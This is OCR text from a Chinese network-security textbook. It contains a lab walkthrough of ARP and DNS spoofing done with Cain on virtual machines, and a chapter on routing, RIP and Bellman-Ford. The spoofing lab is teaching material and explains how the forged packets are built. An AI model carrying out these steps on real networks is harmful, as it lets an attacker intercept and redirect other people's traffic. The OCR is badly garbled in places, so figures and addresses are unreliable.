Windows XP 和 50.1.1.2 


3. 测试 步骤 

第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 

以 host-only 方式 启动 三 台 Windows XP 虚拟 机 和 一 台 Windows 2000 虚拟 机 ,参照 
图 4-112 配置 各 个 对 象 的 IP 地 址 ,注意 本 机 和 Windows XP 虚拟 机 3 的 网 关 设置 为 50. 
1.1.1,DNS 服务 器 设置 为 10. 1. 1.1。Windows XP 虚拟 机 1 和 Windows XP 虚拟 机 2 
的 网 关 设 置 为 10. 1. 1. 1。 

第 二 步 : 为 Windows 2000 虚拟 机 配置 DNS 服务 功能 。 

在 DNS 服务 器 中 将 域名 www. web. com 映射 为 10. 1. 1. 2(Web 服务 器 IP 地 址 ) ,再 
将 域名 www. hacker. com 映射 为 10. 1. 1. 3( 黑 客服 务 器 的 IP 地 址 ), 如 图 4-113 和 
图 4-114 所 示 。 


- Xx| 
」 电 控制 台 (C) 窗口 () 天 助 (HH) |=lslx 
」 炽 作 (查看 WW | 呈 消 | 语 | 四 | 关 轿 阳 电 |@ 


国 与 父 文件 夹 相 同 ) 起 始 授权 机 构 [1], ccpc-cmks8910bu, adm. 
日 - 目 ccpc-cmksseloBu 伍 父 文件 严 相 同 ) 名 称 服务 器 。 ccpc-cmks6910bu, 
日 - 句 正 向 国 www 主机 10.1.1.2 
| 入 hadercon 
上 反 向 搜索 区 域 


| I I 
图 4-113 正常 Web 服务 器 的 映射 记录 
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bb 
| 总 控制 台 (C) 窗口 (4) 天助 (中 | 二 可 [2 
ll 
桂 | 


DNS 从 文件 夹 相同 ) 起 始 授权 机 构 [1] ccpc-cmks8910bu,, adm., 
日 - 目 ccpc-CMKss9108U 父 文件 夹 相同 ) 名 称 服务 器 。 ccpc-cmks8910bu, 
日- 国正 向 搜索 区 域 ow 主机 10.1.1.3 
钱 web.com 


[hacker com 
由 -四 反 向 楼 索 区 域 


| | 
图 4-114 黑客 Web 服务 器 的 映射 记录 
第 三 步 : 在 Web 服务 器 和 黑客 服务 器 上 设置 简单 的 主页 。 
在 Web 服务 器 的 主 目录 下 放置 网 页 文件 index. html, 内 容 为 “this is a normal 
server”。 在 黑客 服务 器 的 主 目录 下 放置 网 页 文件 index. html, 内 容 为 “I am a 


/SF http:/Vwww-web- coa/index-htal — Windows Internet Explorer 
GO Er 面 图 回回] 区 [ 仿 
文件 EF) 编辑 让) 查看) 收藏 夹 &) 工具 CI) 帮助 0D 
帘 收 茂 交 | 和 居于 六 同 


占 。 央 免费 Hotmail 居 ] 同 页 快讯 库 > 


是 http:y/rw web con/index. htnl 从 - 加 赎 ”页 面 E) ”安全 GE) I 具 Q@- 各 


this is a normal server 


ED 交 生 册 二 
窄 收藏 天 | 次 居 汪 


网 站 ” 柜 ] 免费 Hotmail 刀 ] 同 页 


| http: /ew hacker con/index. htnl 芥 - 园 - 局 中 页 面 @o)- 安全 8@)- I 具 Q): 全 - 


I ama hacker ll!!l!l!l!! 


图 4-116 在 本 机 访问 黑客 服务 器 主页 


浏览 两 个 主页 之 后 ,在 本 机 DNS 缓存 表 中 会 保留 域名 和 IP 地 址 的 正确 映射 记录 , 见 
图 4-117。 


第 四 步 : 攻击 者 对 网 关 和 受害 者 主机 实施 ARP 欺骗 攻击 。 

攻击 者 利用 cain 对 受害 者 主机 实施 ARP 欺骗 攻击 ,使 受害 者 主机 的 ARP 缓存 表 中 
网 关 的 IP 地 址 映射 为 攻击 者 的 MAC 地 址 。 构 造 的 ARP 欺骗 报 文 如 图 4-118 所 示 。 

这 是 一 个 伪造 的 ARP 应 答 报 文 , 共 60 字 节 ,包括 14 字 节 链 路 层 数据 ,28 字 节 ARP 
数据 和 18 字 节 的 填充 数据 。 
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5 D:\WINDOVS\systen32\cad. exe 
WW . Web .com 


Record Name 

Record Type 

Time To Live 

Data Length : 
Section : Answer 


A (Host) Record . . . : 16.1.1.2 


WWW.hacker .com 


Record Name 

Record Type 

Time To Live 

Data Length : 

Section : hnswer 
A (Host) Record . . . : 16.1.1.3 


图 4-117 本 机 保存 的 正确 DNS 缓存 信息 


victim MAC 
hacker MAC 


个 28B 村 


Link data ARP data padding data 


-| - 
14B ~ 几 18B 


0001 0800 
06 | 04 0002 


gateway ip 


hacker MAC 


Victim ip 


victim MAC 


图 4-118 发 送 给 受害 者 主机 的 ARP 欺骗 报 文 


链 路 层 数 据 中 ,目的 MAC 地 址 为 受害 者 主机 MAC 地 址 , 源 MAC 地 址 为 攻击 者 主 
机 MAC ,协议 类 型 为 0x0806( 表 示 网 络 层 为 ARP 数据 ) 。 

ARP 数据 中 目的 IP 和 MAC 地 址 为 受害 者 , 源 IP 地 址 为 网 关 , 源 MAC 地 址 为 攻击 
者 主机 MAC, 这 使 得 受害 者 误 认 为 这 是 网 关 发 给 自己 的 ARP 应 答 报 文 ,于 是 取出 源 IP 
和 源 MAC 地 址 记录 到 ARP 缓存 表 中 ,从 而 将 网 关 的 卫 地 址 错误 地 映射 为 攻击 者 主机 的 
MAC, 导 致 受害 者 以 后 发 给 外 网 的 数据 包 将 传送 给 攻击 者 主机 。 图 4-119 为 在 受害 者 主机 
上 查看 到 的 ARP 缓存 表 , 可 见 网 关 的 IP 地 址 50. 1. 1. 1 映射 为 攻击 者 的 MAC 地 址 。 

同样 ,攻击 者 使 用 伪造 的 ARP 应 答 报 文 刷 新 网 关 的 ARP 缓存 表 , 使 得 受害 者 主机 
的 IP 映射 为 攻击 者 的 MAC 地址。 伪造 的 报 文 如 图 4-120 所 示 。 

这 个 伪造 的 ARP 应 答 报 文 共 60 字 节 ,包括 14 字 节 链 路 层 数据 ,28 字 节 ARP 数据 
和 18 字 节 的 填充 数据 。 
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OW¥S\systen32\cad. exe 


D:\Documents and Settings\xgt>arp -a 


Interface: 50.1.1.3 --- 9x2 


Internet Address Physical hddress Type 
59.1.1.1 网 关 IP 99-96c-29-24-21-39 dynamic 
59.1.1.2 99-9c-29-24-21-39 dynamic 


攻击 者 MAC 
图 4-119 受害 者 主机 的 ARP 缓存 表 


gateway MAC 


hacker MAC 
个 用 28B 
Link data ARP data padding data 
i | i | 
14B UL 18B 
0001 0800 
06 | 04 0002 
victim ip 
hacker MAC 


gateway ip 


gateway MAC 


图 4-120 发 送 给 网 关 的 ARP 欺骗 报 文 


链 路 层 数 据 中 ,目的 MAC 地 址 为 网 关 的 MAC 地 址 , 源 MAC 地 址 为 攻击 者 主机 
MAC ,协议 类 型 为 0x0806( 表 示 网 络 层 为 ARP 数据 ) 。 

ARP 数据 中 目的 IP 和 MAC 地 址 为 网 关 , 源 IP 地 址 为 受害 者 , 源 MAC 地 址 为 攻击 
者 主机 MAC, 这 使 得 网 关 误 认为 这 是 受害 者 发 给 自己 的 ARP 应 答 报 文 , 于 是 取出 源 IP 
和 源 MAC 地 址 记录 到 ARP 缓存 表 中 ,从 而 将 受害 者 的 IP 地 址 错误 地 映射 为 攻击 者 主 
机 的 MAC。 图 4-121 为 在 网 关上 查看 到 的 ARP 缓存 表 。 可 见 受害 者 的 IP 地 址 50. 1. 1. 
3 映射 为 攻击 者 的 MAC 地 址 。 至 此 攻击 者 成 为 网 关 与 受害 者 通信 的 “中 间 人 ”。 


[CNWINYT\System32Vcmdexe 画 回 区 
C:\Documents and SettingsNhdministrator>arp -a 


Interface: 590.1.1.1 on Interface OQx3000003 
Internet hddress Physical hddress Type 
50.1.1.3 受害 者 IP 99-9c-29-24-21-339 dynamic 


攻击 者 MAC 
图 4-121 网 关 的 ARP 缓存 表 


第 五 步 : 在 cain 中 添加 DNS 欺骗 映射 记录 。 
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在 cain 中 添加 DNS 欺骗 映射 记录 ,将 域名 www. 四 SS 于 于 嘻 于 时 
web. com 映射 为 黑客 服务 器 的 IP 地 址 10. 1. 1. 3, 如 | DNSNameRequested 


[ww web .com 


图 4-122 所 示 。 
第 六 步 : 攻击 者 截获 .转发 受害 者 发 出 的 DNS 请 求 | 
报 文 。 


由 于 受害 者 主机 的 ARP 缓存 中 网 关 的 IP 地 址 映射 ce 
为 攻击 者 的 MAC 地 址 ,因此 受害 者 在 浏览 Web 服务 器 ”图 4-122 在 cain 中 添加 DNS 
主页 时 发 出 的 DNS 请 求 报 文 会 错误 地 提交 给 攻击 者 。 欺骗 映射 记录 
图 4-123 为 攻击 者 截获 的 DNS 请 求 报 文 。 
[| hackerMAC | s-port d-port www.web.com 
victim MAC length check 0x01 0x01 


Link data 


< 


length | id flag 
id flag Q-count A-count 
| TT | eheck 0x00 | ox00 
victim ip 
DNS server ip 


图 4-123 攻击 者 截获 的 DNS 请 求 报 文 


14B nB 


这 个 DNS 请 求 报 文 包括 14 字 节 链 路 层 数据 、20 字 节 IP 首部 ,8 字 节 UDP 首部 、12 
字 节 DNS 首部 和 多 个 字 节 的 DNS 问题 数据 。 

在 链 路 层 数 据 中 , 源 MAC 地 址 为 受害 者 主机 MAC, 目的 MAC 地 址 为 攻击 者 
MAC。IP 首部 中 源 IP 地 址 为 受害 者 ,目的 IP 地 址 为 DNS 服务 器 。 在 DNS 问题 数据 中 
携带 的 问题 是 请 求 查询 www. web. com 域名 对 应 的 IP 地 址 。 

攻击 者 重新 封装 这 个 报 文 之 后 ,将 其 转发 出 去 。 转 发 的 DNS 请 求 报 文 如 图 4-124 所 


gateway MAC S-port d-port www.web.com 
hacker MAC length check 0x01 0x01 
个 20B 12B | 个 
Link data IP header DNS header DNS question 
14B UL U nB 
length | id flag 
id flag | Q-count A-count 
check | 0x00 | Ox00 


victim ip 
DNS server ip 
图 4-124 攻击 者 转发 的 DNS 请 求 报 文 
TTF 
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示 。 可 见 只 是 将 目的 MAC 地 址 改 为 网 关 、 源 MAC 地 址 改 为 攻击 者 ,其 他 字段 不 变 。 


第 七 步 : 攻击 者 截获 .修改 .转发 DNS 应 答 报 文 。 


由 于 网 关 的 ARP 缓存 表 中 受害 者 的 IP 地 址 映射 为 攻击 者 的 MAC 地 址 ,因此 网 关 
将 DNS 应 答 报 文 错误 地 提交 给 攻击 者 。 图 4-125 为 攻击 者 截获 的 DNS 应 答 报 文 。 


www.web.com 
question 
oxol | oxol 
name-ptr 0x01 
0x01 0x00 first 
hacker MAC s-port d-port TI 0x04 answer 
gateway MAC length check 10.1.1.2 


人 


Link data 


DNS question 


14B UL 8B UL nB 
length id flag 
id flag 0x01 0x02 
check 0x00 0x00 
DNS server ip 
victim ip 


图 4-125 攻击 者 截获 的 DNS 应 答 报 文 


在 链 路 层 数据 中 ,目的 MAC 地 址 为 攻击 者 , 源 MAC 地 址 为 网 关 。 在 卫 首 部 中 目的 卫 
地 址 为 受害 者 卫 , 源 IP 地 址 为 DNS 服务 器 IP。 在 DNS 数据 部 分 包括 一 个 问题 记录 和 一 个 
回答 记录 ,其 中 回答 记录 中 携带 了 www. web. com 域名 所 对 应 的 IP 地 址 10. 1. 1. 2。 

攻击 者 修改 并 转发 的 DNS 应 答 报 文 见 图 4-126。 可 见 在 链 路 层 数 据 中 目的 MAC 地 


Www.web.com je 
0x01 0x01 
name-ptr 0x01 
0x01 0x00 first 
victim MAC s-port d-port TL 0x04 answer 
hacker MAC length check i013 
个 20B 个 12B 个 
Link data IP header oe DNS question 
14B UL 8B 由 nB 
length id flag 
id flag 0x01 0x02 
check 0x00 0x00 
DNS server ip 
victim ip 


图 4-126 攻击 者 修改 并 转发 的 DNS 应 答 报 文 
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址 改 为 受害 者 , 源 MAC 地 址 改 为 攻击 者 。 在 DNS 数据 中 , Web 服务 器 的 IP 地 址 10. 1. 


1. 2 被 改 为 黑客 服务 器 的 IP 地 址 10. 1. 1. 3。 
第 八 步 : 受害 者 收 到 DNS 欺骗 ,通信 被 引导 至 黑客 服务 器 。 


受害 者 从 DNS 应 答 报 文中 取出 域名 www. web. com 和 IP 地 址 10. 1. 1. 3 添加 到 
DNS 缓存 表 中 。 图 4-127 为 受害 者 主机 的 DNS 缓存 记录 ,可 见 域名 www. web. com 被 


映射 为 黑客 服务 器 的 IP 地 址 10. 1. 1. 3。 


5 D:\WINDOYS\systen32\cad. exe [jejy| 


WWW .Web .com 


Record Name 入 咀 
Record Type . . . : Web 服 务 器 
Time To Liue 

Data Length . .. 日 

Section .. : Answer 

A (Host) Record . . . : 19.1.1.3 


-一 攻击 者 


图 4-127 受害 者 主机 的 DNS 缓存 记录 


受害 者 访问 www. web. com/index. html 时 看 到 的 是 黑客 服务 器 的 主页 ,如 图 4-128 


所 示 ,说明 DNS 欺骗 攻击 成 功 。 


/2 http:/Vwww-web- con/index. htal — Windows Internet Explorer 
GO Ov S|x| | 
文件 人 E) 编辑 于) 查看 VW 收 若 夹 4) 工具 CI) 帮助 00 

充 收藏 严 | 痪 旧 ”起 ] 免费 jotnsil €] 


» 


赔 http://wm web con/index. htnl 芥 - 园 3 有 寺 ”页 面 f)， 安全 &)- 工具 Q)- 各 


4 太 100% > 


图 4-128 访问 结果 


在 攻击 者 主机 上 的 cain 软件 中 可 以 查看 到 DNS 欺骗 的 次 数 , 见 图 4-129。 


Eile Yien Configure Tools Help 
| 包 昌 坑 器 器 | 十 卫 区 电站 辆 本 因 国 斩 急 号 @@9? i 


人 Decoders [ Wetwork [Bsnitter [G7 Cracker [@ traceroute [加 cv TY Wireless [BD toery | 


: quested DNS nane ep, Spoofe 
APR Requested DIS esp Spoofed 
是 APR-Cert 回 wer. web. eon 2 


总 
APR-SSH-1 @) 
自 APR-MTTFS @) 


甸 Ar 0) 

加 MPR-FTPS 加 ) 
四 APR-POP3S (0) 
自 APR-IIAPS (0) 
全 APR-IDAPS 0) 
自 APR-SIPS @O) 


@ wr [B soutine [DR Fessrorss [vr] 


Lost packets: 0% 


图 4-129 在 cain 上 查看 到 的 结 


Ti9 
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思考 题 


1. 你 能 想 出 哪些 方案 来 增强 ARP 的 安全 性 ? 

2. ARP 缓存 表 的 作用 是 什么 ? 

3. 在 主机 端 绑 定 本 网 段 内 其 他 主机 的 IP 和 MAC 地 址 能 否 彻底 预防 ARP 欺骗 ? 

4. ARP 欺骗 有 两 种 实现 方式 , 即 伪造 一 个 ARP 请 求 报 文 或 伪造 一 个 ARP 应 答 报 
文 ,请 问 哪 种 方式 隐蔽 性 更 强 ? 

5. 如 果 你 怀疑 本 网 段 内 存在 ARP 欺骗 ,如 何 确定 攻击 源 ? 

6. ARP 欺骗 有 哪些 危害 ? 
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第 5 重 、 
RIP 及 其 安全 问题 


51 ”路 由 器 的 工作 原理 


常见 的 网 络 互联 设备 包括 集线器 .交换 机 和 路 由 器 ,每 种 设备 工作 在 TCP/IP 协议 簇 
的 不 同 层 次 。 集 线 器 不 检查 接收 到 数据 包 的 内 容 , 就 直接 将 这 个 数据 包 在 所 有 端口 (接收 
端口 除外 ) 转 发 出 去 ,因此 集线器 是 广播 类 型 的 设备 ,工作 在 物理 层 。 交 换 机 接收 到 一 个 
数据 包 之 后 ,取出 报 文 的 目的 MAC 地 址 ,到 自己 的 MAC 地 址 表 中 进行 匹配 查找 ,找到 
匹配 记录 之 后 ,在 特定 的 端口 转发 这 个 数据 包 , 因 此 交换 机 是 一 种 单 播 设备 ,工作 在 数据 
链 路 层 。 路 由 器 收 到 一 个 数据 报 之 后 ,取出 报 文 的 目的 IP 地 址 ,到 自己 路 由 表 中 进行 匹 
配 查找 ,找到 匹配 记录 之 后 ,在 特定 的 接口 转发 报 文 ,因此 路 由 器 是 一 种 网 络 层 设备 。 


5.1.1 路 由 表 的 组 成 


图 5-1 给 出 的 是 由 4 条 路 由 项 组 成 的 路 由 表 。 表 中 包含 三 个 字段 : 目的 网 络 地 址 , 距 
离 ( 到 达 目 的 网 络 经 过 的 路 由 器 个 数 加 1) ,下 一 跳 ( 到 达 目 的 网 络 的 下 一 个 路 由 器 的 IP 
地 址 )。 如 果 目 的 网 络 与 这 人 台 路 由 器 直接 连接 ,那么 下 一 跳 地 址 表示 为 “一 ”例如 图 5-1 
中 第 二 ,三 条 路 由 。 在 这 种 表示 方法 中 子 网 掩 码 隐 含 在 网 络 地 址 中 ,例如 ,网 络 地 址 为 
10.1.1.0, 那 么 对 应 的 子 网 掩 码 为 255. 255. 255.0。 如 果 网 络 地 址 为 10. 1. 0. 0 ,那么 子 网 
掩 码 为 255. 255. 0. 0。 


目的 网 络 距离 下 一 跳 
10.1.10 3 192.1.1.1 
192.1.1.0 1 一 
192.2.2.0 1 一 
192.3.3.0 3 192.2.2.2 
图 5-1 路 由 表 的 组 成 


图 5-1 中 第 一 条 路 由 表示 到 达 10.1.1.0 网 络 ,下 一 个 路 由 器 的 IP 地 址 为 192. 1. 1. 
1, 共 经 过 三 台 路 由 器 。 第 二 ,三 条 路 由 表示 192. 1. 1.0 和 192. 2. 2. 0 与 这 台 路 由 器 直接 
连接 。 第 4 条 路 由 表示 到 达 192. 3. 3. 0 网 络 , 下 一 个 路 由 器 的 IP 地 址 为 192. 2. 2. 2 , 共 经 
过 三 台 路 由 器 。 

为 什么 不 对 目的 网 络 中 的 每 个 IP 地 址 设置 一 条 路 由 ,而 是 对 整个 网 络 设置 一 条 路 由 
呢 ? 以 第 一 条 路 由 为 例 , 网 络 地 址 为 10. 1. 1. 0, 这 个 网 络 的 IP 地 址 范围 是 10. 1. 1. 1 一 
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10.1.1.254, 共 254 个 IP 地 址 ,试想 如 果 为 每 个 IP 设置 一 条 路 由 ,那么 路 由 表 将 变 得 非 
常 庞大 ,这 一 方面 会 消耗 大 量 的 存储 空间 ,同时 也 会 导致 路 由 器 的 转发 效率 降低 。 因 此 路 
由 器 使 用 网 络 地 址 为 每 个 目的 网 络 设置 一 条 转发 记录 。 


5.12 路 由 器 转发 数据 报 的 工作 流程 


如 图 5-2 所 示 的 网 络 环境 中 R1 一 R3 路 由 器 连接 了 NET1 一 NET4 网 络 。 图 中 给 出 
了 每 个 网 络 的 网 络 地 址 ,每 台 路 由 器 的 接口 IP 地 址 和 路 由 表 。 下 面 举例 分 析 路 由 器 是 如 
何 根据 路 由 表 实 现 数据 报 转 发 的 。 

假设 NET1 网 络 内 的 PC1(IP 地 址 为 10. 1. 1. 20) 给 NET4 网 络 的 PC2(IP 地 址 为 
192. 3. 3.50) 发 送 一 个 IP 数据 报 。 数 据 报 的 源 IP 地 址 为 10. 1. 1. 20, 目 的 IP 地 址 为 
192. 3.3.50。 下 面具 体 分 析 这 个 数据 报 是 如 何 转发 到 目的 地 PC2 的 。 

PC1 首先 将 这 个 报 文 提 交 给 默认 网 关 Rl1。R1l 收 到 这 个 报 文 之 后 取出 目的 IP 地 址 
(192. 3.3.50) 到 自己 的 路 由 表 中 进行 匹配 查找 ,查找 的 原则 是 : 用 目的 IP 地 址 依次 和 每 
条 记录 的 子 网 掩 码 做 与 运算 ,结果 和 对 应 记录 的 网 络 地 址 比较 ,相同 则 匹配 ,不 同 则 比较 
下 一 条 记录 。 首 先 和 第 一 条 记录 进行 比较 ,将 192. 3. 3. 50 和 255. 255. 255. 0 做 与 运算 ， 


结果 为 192. 3. 3. 0, 显然 与 网 络 地 址 10. 1. 1. 0 不 同 ,因此 数据 报 与 第 一 条 记录 不 匹配 。 
同样 道理 ,这 个 IP 数据 报 与 第 二 三 条 记录 也 不 匹配 。 第 4 条 记录 的 子 网 掩 码 255. 255. 
255.0 与 192. 3. 3. 50 做 与 运算 ,结果 为 192. 3. 3.0, 与 第 4 条 记录 的 网 络 地 址 相同 ,因此 
数据 报 与 第 4 条 记录 匹配 。 数 据 报 被 转发 给 192. 1. 1.2, 即 R2 路 由 器 。 

10.1.1.0 3 192.1.1.1 

192.10 1 一 

192.2.2.0 1 一 

192.3.3.0 3 192.2:2.2 

R2 的 路 由 表 
NETI1 192.2.2.1 NET3 


192:1.12 


10.1.1.1 


192.3.3.1 
Rl NET2 NET4 
10.1.1.0 1 一 10.1.1.0 4 192.2.2.1 
192.1.1.0 1 一 192.1.1.0 3 192.2.2.1 
192.2.2.0 3 1192.4.12 192.2.2.0 ] 一 
192.3.3.0 4 192.41.1.2 192.3.3.0 一 
R1 的 路 由 表 R3 的 路 由 表 


图 5-2 路 由 器 转发 数据 报 的 工作 流程 
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R2 收 到 数据 报 之 后 ,取出 目的 IP 依 次 和 自己 路 由 表 中 的 4 条 记录 进行 匹配 ,发 现 和 
第 4 条 路 由 匹配 ,于 是 将 这 个 数据 报 转发 给 192. 2. 2.2, 即 R3 路 由 器 。 

R3 收 到 数据 报 之 后 ,取出 目的 IP 依 次 和 自己 路 由 表 中 的 4 条 记录 进行 匹配 ,发 现 和 
第 4 条 路 由 匹配 ,这 是 一 条 本 地 直 连 路 由 ,R3 将 数据 报 直接 交付 给 PC2。 至 此 数据 报 经 
过 R1、R2、R3 的 传递 最 终 到 达 目 的 地 PC2。 为 了 便于 分 析 , 使 用 如 图 5-3 所 示 简 化 的 路 


由 表 。 


NETI1 


NET3 


NET2 


图 5-3 简化 的 路 由 表 


5.1.3 路 由 协议 


NET4 


N1 
N2 
N3 
N4 


R3 的 路 由 表 


通过 上 面 的 分 析 可 见 , 路 由 器 是 根据 路 由 表 实 现 数据 报 的 转发 ,那么 路 由 表 是 如 何 形 
成 的 呢 ? 答案 是 路 由 协议 。 路 由 协议 的 主要 作用 包括 : 生成 .维护 路 由 表 和 根据 路 由 表 
转发 数据 报 。 图 5-4 给 出 的 是 常见 路 由 协议 ,包括 内 部 路 由 协议 (RIP 和 OSPF) 和 外 部 路 
由 协议 (BGP)。RIP 和 OSPF 用 于 自治 系统 内 部 的 路 由 器 ,BGP 用 于 自治 系统 的 边界 路 


由 融 。 


路 由 选择 协议 


RP | | osFF 


图 5-4 路 由 协议 


外 部 | 


123 


ED 网 络 安全 基础 ”Pagl 


图 5-5 给 出 了 由 4 个 自治 系统 组 成 的 网 络 环境 ,每 个 自治 系统 内 部 的 路 由 器 使 用 同 
一 种 内 部 路 由 协议 (RIP 或 OSPF) ,它们 只 了 解 自治 系统 内 部 各 个 子 网 的 路 由 信息 。 到 
达 其 他 自治 系统 的 路 由 信息 保存 在 边界 路 由 器 R1、R2、R3 和 了 R4 中 ,这 4 台 路 由 器 上 同 
时 运行 了 一 种 内 部 路 由 协议 和 BGP, 内 部 路 由 协议 用 于 形成 自治 系统 内 部 的 路 由 信息 ， 
外 部 路 由 协议 用 于 形成 自治 系统 之 间 的 路 由 信息 。 


自治 系统 自治 系统 
图 5-5 自治 系统 


BE2 路 由 选择 信息 协议 


路 由 选择 信息 协议 (Routing Information Protocol,RIP) 是 一 种 在 自治 系统 内 部 使 用 
的 内 部 路 由 选择 协议 。 它 是 一 种 基于 距离 矢量 路 由 选择 的 简单 协议 , 它 使 用 Bellman- 
Ford 算法 计算 路 由 选择 表 。 


521 RP 选择 的 是 经 过 最 少 路 由 器 的 路 由 


RIP 选择 的 是 经 过 最 少 路 由 器 的 路 由 。 在 图 5-6 中 ,从 Net56 到 达 Net78 有 两 条 路 
。 第 一 条 是 B-~A 一 Net78。 第 二 条 是 C 一 D 一 E 一 A 一 Net78。 如 果 这 个 自治 系统 
as Net56 网 络 发 出 的 数据 报 将 沿 着 第 一 条 路 径 到 达 Net78 。 


522 RiP 使 用 的 路 由 表 


每 台 路 由 器 都 维护 一 个 路 由 选择 表 , 该 路 由 器 所 知道 的 每 个 目的 网 络 在 路 由 表 中 都 
有 一 条 记录 。 每 条 记录 由 目的 网 络 地 址 、 跳 数 ( 即 到 达 目 的 网 络 经 过 的 路 由 器 个 数 加 1) 
和 下 一 跳 地址 ( 即 一 个 IP 数据 报 为 到 达 最 终 目 的 网 络 所 应 该 传递 的 下 一 个 路 由 器 IP 地 
址 ) 组 成 。 
路 由 表 中 还 可 能 包含 一 些 其 他 信息 ,例如 子 网 掩 码 或 这 条 记录 最 后 被 更 新 的 时 间 等 。 
图 5-7 给 出 的 是 一 个 由 RIP 形成 的 路 由 表示 例 。 
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本 
图 5-6 ”RIP 协议 选择 最 少 跳 数 的 路 由 


目的 网 络 ”| 跳 数 (距离) 下 一 跳 

1635.00 | 7 172.6.23.4 
1975.130 | 5 176.3.6.17 
18945.0.0 | 4 200.5.1.6 
115.0.0.0 6 131.4.7.19 


图 5-7 RIP 形成 的 路 由 表 举 例 


RIP 形成 的 路 由 表 中 的 跳 数 也 称 为 距离 ,是 经 过 的 路 由 器 的 个 数 加 1,RIP 允许 一 条 
路 径 最 多 只 能 包含 15 个 路 由 器 ,距离 的 值 为 16 时 可 认为 目的 网 络 不 可 达 。 这 一 特性 限 
制 了 RIP 只 能 使 用 在 中 、 小 规模 的 网 络 中 。 


523 RP 的 三 个 特点 


使 用 RIP 的 路 由 器 定期 与 临近 路 由 器 共享 整个 自治 系统 的 路 由 信息 。RIP 包括 以 
下 三 个 特点 。 

(1) 仅 和 相 邻 路 由 器 交换 路 由 信息 : 为 了 减少 通信 量 , 使 用 RIP 的 路 由 器 只 和 相 临 
路 由 器 交换 路 由 信息 。 

(2) 交换 的 信息 是 自己 当前 的 路 由 表 : 使 用 RIP 的 路 由 器 将 自己 的 路 由 表 交 换 给 相 
临 其 他 路 由 器 。 

(3) 按 固定 的 时 间 间 隔 交换 路 由 信息 : 每 个 路 由 器 均 按 照 固定 时 间 , 例 如 30s ,将 自 
己 的 路 由 表 发 送 给 相 临 路 由 器 。 


5 3 Bellman-Ford 算法 生成 路 由 表 


启用 RIP 的 路 由 器 每 隔 固 定 的 时 间 间 隔 ( 例 如 30s) 就 会 将 自己 的 路 由 表 发 送 给 临近 
的 其 他 路 由 器 ,同时 路 由 器 对 接收 到 的 路 由 表 和 自身 的 旧 路 由 表 应 用 Bellman-Ford 算法 
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得 到 新 的 路 由 表 。 
Bellman-Ford 算法 描述 如 下 : 
(1) 收 到 相 邻 路 由 器 X 的 一 个 RIP 响应 报 文 , 先 修改 此 RIP 响应 报 文 的 所 有 通告 
将 下 一 跳 地 址 都 改 为 X, 跳 计数 的 值 都 加 1。 
(2) 对 每 个 通告 的 目的 网 络 地 址 重复 下 列 步 又 。 
if( 目 的 网 络 地 址 不 在 路 由 选择 表 中 ) 
将 通告 信息 添加 到 表 中 
else 
if( 下 一 跳 字段 相同 ) 
用 通告 记录 来 替代 表 中 的 记录 
else 
if (通告 跳 计数 小 于 表 中 的 计数 ) 
替代 路 由 选择 表 中 的 记录 
(3) 返回 。 
下 面 举例 说 明 Bellman-Ford 算法 。 如 图 5-8 所 示 ,路 由 器 DD 收 到 路 由 器 C 发 送 来 的 
RIP 响应 报 文 ( 即 路 由 器 C 的 当前 路 由 表 ) 。 根 据 Bellman-Ford 算法 , 先 将 所 有 路 由 项 的 
跳 数 加 1, 下 一 跳 地 址 改 为 C, 之 后 将 修改 过 的 RIP 响应 报 文 与 路 由 器 DD 的 旧 路 由 表 进 行 
比较 ,得 出 新 的 路 由 表 。 


路 由 器 D 收 到 C 来 的 RIP 响 应 报 文 

网 2 4 A 修改 后 的 RIP 响 应 报 文 

网 3 8 A Ce 

网 6 4 E I> 网 9 C 

网 8 3 E 网 5 C 

网 9 5 F 网 8 4 C 

网 9 6 C 
路 由 器 D 旧 路 由 表 路 由 器 D 新 路 表 

1 7 A l 

网 2 C 

6 8 上 | 呈 一 > | 更 新 算法 | 一 一 > 
84E 

9 4 下 


图 5-8 路 由 表 更 新 实例 


由 于 RIP 响应 报 文 中 没有 到 达 网 1 的 路 由 信息 ,因此 保留 旧 路 由 表 中 网 1 路 由 信 

息 。RIP 响应 报 文 和 路 由 器 D 的 旧 路 由 表 中 均 有 到 达 网 2 的 路 由 信息 , 且 下 一 跳 地 址 都 
是 C, 这 种 情况 根据 算法 选择 最 新 的 路 由 , 即 采纳 RIP 响应 中 的 路 由 项 :网 2 5 C。 

旧 路 由 表 和 RIP 响应 中 都 有 到 达 网 6 的 路 由 信息 , 且 下 一 跳 地 址 不 同 , 这 时 选择 跳 

数 小 的 , 即 采纳 RIP 响应 中 的 路 由 项 :网 6 5 C。 旧 路 由 表 和 RIP 响应 中 都 有 到 达 网 

8 的 路 由 信息 , 且 下 一 跳 地 址 不 同 , 但 两 条 路 由 的 跳 数 都 是 4, 这 时 保留 旧 路 由 项 :网 8 4 

EE。 旧 路 由 表 和 RIP 响应 中 都 有 到 达 网 9 的 路 由 信息 , 且 下 一 跳 地 址 不 同 , 这 时 选择 跳 

数 小 的 , 即 采纳 旧 路 由 表 中 的 路 由 项 :网 9 4 F。 旧 路 由 表 中 没有 到 达 网 3 的 路 由 信 
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息 , 因 此 采纳 RIP 响应 中 的 路 由 项 : 网 3 9 C, 至 此 路 由 表 更 新 完成 。 


后 硬 RIP 形成 路 由 表 的 过 程 


下 面 举例 说 明 RIP 路 由 表 的 形成 过 程 ,网 络 拓扑 结构 如 图 5-9 所 示 ,4 个 网 络 
(NET1I NET2、 NET3 NET4) 通 过 三 台 路 由 器 (R1、R2、R3) 连 接 在 一 起 。 初 始 状态 下 每 
台 路 由 器 都 只 知道 自己 本 地 直 连 网 络 的 路 由 信息 , 即 R1 连接 Nl 和 N2、R2 连接 N2 和 
N3、R3 连接 N3 和 N4。 初 始 状 态 下 每 台 路 由 器 的 路 由 表 如 图 5-9 所 示 。 


Nl 1 一 
N2 1 一 


R1 的 路 由 表 


图 5-9 网 络 拓扑 


Rl 和 R2 是 同属 于 NET2 的 相 邻 路 由 器 ,它们 将 各 自 掌 握 的 路 由 表 发 送 给 对 方 ,这 
是 第 一 轮 路 由 交换 。 图 5-10 给 出 的 是 R1 路 由 表 的 更 新 过 程 。R2 发 来 的 RIP 应 答 报 文 
中 包含 两 条 本 地 直 连 路 由 (N2 一 2 一 本 地 、N3 一 2 一 本 地 ) ,注意 路 由 器 在 发 送 本 地 直 连 路 
由 时 自动 将 跳 数 设置 为 2。R1 将 这 两 条 路 由 的 跳 数 加 1, 下 一 跳 改 为 R2。 对 修改 之 后 的 
